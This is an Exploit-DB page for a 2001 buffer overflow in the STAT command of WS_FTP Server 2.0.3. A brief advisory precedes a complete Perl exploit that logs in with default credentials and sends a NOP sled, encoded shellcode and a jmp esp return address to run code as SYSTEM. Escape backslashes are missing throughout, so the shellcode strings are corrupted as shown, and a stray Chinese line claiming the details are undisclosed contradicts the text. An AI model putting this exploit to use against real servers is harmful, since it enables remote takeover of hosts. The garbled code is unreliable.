https://www.exploit-db.com/exploits/21142

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/3507/info

WS_FTP Server, a popular FTP server for Microsoft Windows platforms, is vulnerable to a buffer overflow condition when a user submits a specially crafted legitimate FTP command. WS_FTP Server by default runs as a SYSTEM service.

If a logged in user submits a 'STAT' command along with arbitrary characters (approx 479 bytes) to a host running WS_FTP Server, this could result in the overwriting of stack variables, including the return address, and potentially the execution of arbitrary code with SYSTEM privileges. 

#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By [email protected] (C)2001
#
# 
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing,
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, Im only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependant on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack, it just ends with CreateFile overwriting stuff.
#
# Im using a "jump esp" in shlwapi.dll(0x70beed87) as the return address,
# change this if it does not work on your system.
#
#########################################################################
$login="ftp";	#username
$pass="ftp";	#password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
	print "WS_FTP server 2.0.3 STAT proof-of-concept exploitn";
	print "It creates a file named defcom.iyd in the c-rootn";
	print "(C)2001 [email protected]";
   	print "Usage: $0 <host>n";
	print "Example: $0 127.0.0.1n";
	exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain
recv(SOCK,$reply,1024,0);
@split1 = split(/ /,$reply);
@split2 = split(/-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,".");
if ($pos == -1) { print "Error: Domain has to be atleast two characters"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be atleast two characters"; exit; }
###########################################################################################

sleep(1);
$msg = "user $loginn"; 
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $passn";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit="xebx03x5axebx05xe8xf8xffxffxffx8bxc2x83xc0x1axebx02xebx80x33";
$sploit = $sploit . "xc9x66xb9xd6x80x66x81xf1x80x80x80x30x99x40xe2xfax12";
$sploit = $sploit . "x7bx1ax75x92x12x75xcbxf1x99x63x99x99xf1xd9x99x99x99";
$sploit = $sploit . "x27x45x8dxdcx99x66x8fxc3x9cx99x63x99x99x12x79x12x75";
$sploit = $sploit . "xaax59xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1a";
$sploit = $sploit . "x5bxfbxcbx27xbdx8cxdcx99x66x8fxaax59xc9x27x89x8fxdc";
$sploit = $sploit . "x99x66x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
$msg = "stat " . "x90" x (480-length($sploit)-length($servername)) . $sploit . "x87xedxbex70" . "x90" x 16 . "xebx81" . "rn";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;